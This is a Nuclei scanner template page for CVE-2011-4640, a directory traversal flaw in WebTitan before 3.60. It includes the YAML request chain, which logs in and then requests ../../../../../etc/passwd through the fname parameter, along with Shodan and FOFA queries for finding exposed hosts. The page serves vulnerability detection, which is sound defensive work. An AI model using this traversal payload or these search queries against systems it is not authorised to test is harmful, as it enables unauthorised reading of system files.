Skip to content
Nuclei Templates

WebTitan < 3.60 - Local File Inclusion

ID: CVE-2011-4640

Severity: medium

Author: ctflearner

Tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated

Description

Section titled “Description”

Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.

YAML Source

Section titled “YAML Source”
id: CVE-2011-4640


info:
  name: WebTitan < 3.60 - Local File Inclusion
  author: ctflearner
  severity: medium
  description: |
    Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.
  reference:
    - https://www.exploit-db.com/exploits/37943
    - https://nvd.nist.gov/vuln/detail/CVE-2011-4640
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N
    cvss-score: 4
    cve-id: CVE-2011-4640
    cwe-id: CWE-22
    epss-score: 0.05544
    epss-percentile: 0.93225
    cpe: cpe:2.3:a:spamtitan:webtitan:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: spamtitan
    product: webtitan
    shodan-query:
      - title:"WebTitan"
      - http.favicon.hash:1090061843
    fofa-query:
      - icon_hash=1090061843
      - title="webtitan"
  tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated


http:
  - raw:
      - |
        GET /login-x.php HTTP/1.1
        Host: {{Hostname}}


      - |
        POST /login-x.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest


        jaction=login&language=en_US&username={{username}}&password={{password}}


      - |
        GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "success\":true")'
          - 'contains(body_1, "WebTitan")'
          - "regex('root:.*:0:0:', body)"
          - 'status_code_3 == 200'
        condition: and
# digest: 4b0a00483046022100f424cd39c738add5043c359aa3220980490a54dd8f80362ed7fb4328f0e78f65022100805beaeacfbb871e31856e55bfe869a65caba3767f4d80a7fec71fdbb6ac01b5:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2011/CVE-2011-4640.yaml"

View on Github